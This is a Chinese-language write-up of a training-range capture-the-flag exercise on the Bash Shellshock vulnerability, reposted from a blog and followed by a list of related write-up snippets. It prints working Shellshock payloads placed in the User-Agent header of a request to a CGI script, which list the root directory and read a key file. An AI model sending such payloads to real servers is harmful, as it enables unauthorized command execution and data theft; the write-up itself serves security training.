0x00.题目描述：

背景介绍

安全工程师"墨者"对一单位业务系统进行授权测试，在测试过程中，发现存在bash命令执行漏洞。

实训目标

1、了解bash；

2、了解Bash远程命令执行漏洞形成原因；

3、了解Bash远程命令执行漏洞利用方法；

解题方向

找到poc.cgi文件

0x01.题目分析：

根据题目说明，在网上对Bash远程命令执行漏洞进行了一番学习。

参考连接

freebuf：https://www.freebuf.com/vuls/44994.html

Seebug：https://www.seebug.org/vuldb/ssvid-88877

0x02.解题过程

通过网上的资料搜查，发现此漏洞存在的路径多数在网页/cgi-bin/下，结合题目给的提示，打开http://url/cgi-bin/poc.cgi

构造执行语句插入到请求头的User-Agent头里面

User-Agent: () { :;}; echo; /bin/ls /

然后构造执行语句查看key.txt

User-Agent: () { :;}; echo; /bin/cat /key.txt

转载于:https://www.cnblogs.com/qtisec/p/11095444.html

[ 墨者学院 ] 命令执行——Bash漏洞分析溯源相关推荐

墨者靶场初级：Bash漏洞分析溯源
墨者靶场初级:Bash漏洞分析溯源题目背景介绍实训目标解题方向解题步骤题目背景介绍安全工程师"墨者"对一单位业务系统进行授权测试,在测试过程中,发现存在bash命 ...
墨者学院-登录密码重置漏洞分析溯源
墨者学院-登录密码重置漏洞分析溯源此题我是这么做出来的,首先用我已知的手机号进行重置密码操作,然后再开一个网页,填上嫌疑人的手机号,并发送短信,然后也给已知的手机号发送验证码再给嫌疑人的复制过去, ...
墨者学院-Bash漏洞分析溯源
Bash漏洞分析溯源难易程度:★★ 题目类型:命令执行使用工具:FireFox浏览器.wwwscan 1.打开靶场,根据题目思路找poc.cgi. 2.使用wwwscan扫一下发现有目录/cgi ...
墨者学院_phpMyAdmin后台文件包含分析溯源
墨者学院_phpMyAdmin后台文件包含分析溯源 phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) phpMyAdmin是一套开源的.基于Web的MySQL数据库管 ...
墨者学院 - Bash漏洞分析溯源
bash漏洞技术层面分析漏洞起源: 漏洞信息最早来源于国外知名漏洞网站exploit-db下的第34765篇漏洞报告,其中出现了一条验证命令: env x='() { :;}; echo vulne ...
Bash漏洞分析溯源 cgi文件（CVE-2014-6271） --墨者学院
01 背景介绍 Bash脚本在解析某些特殊字符串时出现逻辑错误导致可以执行后面的命令,在一些cgi脚本中,数据是通过环境变量来传递的,这样就会形成该漏洞: bash通过以函数名作为环境变量名,以&qu ...
墨者 - Bash漏洞分析溯源
bash代码注入的安全漏洞分析 bash的环境变量环境变量是操作系统运行shell中的变量,很多程序的运行需要获取系统的环境变量参数.具体赋值格式如下: $ var="hello worl ...
Bash漏洞分析溯源
漏洞简介 Bash(GNU Bourne-Again Shell)是一个命令处理器,通常运行于文本窗口中,并能执行用户直接输入的命令.Bash还能从文件中读取命令,这样的文件称为脚本. 1.bash漏 ...
墨者Bash漏洞分析溯源题解
这个漏洞是看别人的思路解出来的,因为在打开页面后,我扫描不出来其他东西,惭愧后台存在一个地址,是http://219.153.49.228:49581/cgi-bin/poc.cgi 访问这个地址 ...

[ 墨者学院 ] 命令执行——Bash漏洞分析溯源